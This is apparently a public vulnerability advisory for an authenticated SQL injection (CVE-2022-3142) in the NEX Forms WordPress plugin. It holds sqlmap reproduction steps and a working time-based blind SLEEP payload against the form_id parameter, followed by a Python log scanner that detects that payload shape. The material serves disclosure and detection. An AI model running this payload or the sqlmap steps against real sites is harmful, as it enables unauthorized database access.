exploit.txt
# Exploit Title: "NEX Forms" WordPress plugin SQL Injection vulnerability
# Google Dork: N/A
# Date: 2022-08-01
# Exploit Author: Elias Hohl
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Version: < 7.9.7
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142
Authenticated SQL injection vulnerability in the "NEX Forms" WordPress plugin
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
1. Start a new WordPress instance using docker-compose.
2. Install the NEX Forms plugin.
3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
4. Execute the following command: sqlmap -r nex-forms-req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap will find a time-based blind payload:
Parameter: form_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
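As an added detection example (not part of the advisory), this Python snippet scans web-server access log lines for requests to the dashboard endpoint above whose form_id is not a plain integer, and labels the SLEEP()/BENCHMARK() shape that sqlmap reports as a time-based blind payload; the log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access log lines (Apache combined format); not from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2022:10:00:07 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1%20AND%20(SELECT%204715%20FROM%20(SELECT(SLEEP(5)))nPUi) HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2022:10:00:20 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=2 HTTP/1.1" 200 4800
10.0.0.9 - - [01/Aug/2022:10:01:00 +0000] "GET /wp-admin/admin.php?page=other&form_id=abc HTTP/1.1" 200 100
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# MySQL time-based blind primitives: SLEEP (as in the sqlmap output above) and BENCHMARK.
TIME_BASED_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)


def analyze_line(line):
    """Return a finding dict for a suspicious nex-forms-dashboard request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    qs = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    # Only the vulnerable endpoint is of interest: admin.php with page=nex-forms-dashboard.
    if url.path != "/wp-admin/admin.php" or qs.get("page") != ["nex-forms-dashboard"]:
        return None
    for value in qs.get("form_id", []):
        if value.isdigit():
            continue  # expected shape: a plain numeric form id
        reason = "time-based blind payload" if TIME_BASED_RE.search(value) else "non-numeric form_id"
        return {"form_id": value, "reason": reason}
    return None


def scan_log(text):
    """Run analyze_line over every line and return the list of findings."""
    return [f for f in (analyze_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Any hit is a reason to confirm the plugin is at a version not covered by the "< 7.9.7" range the advisory lists as affected.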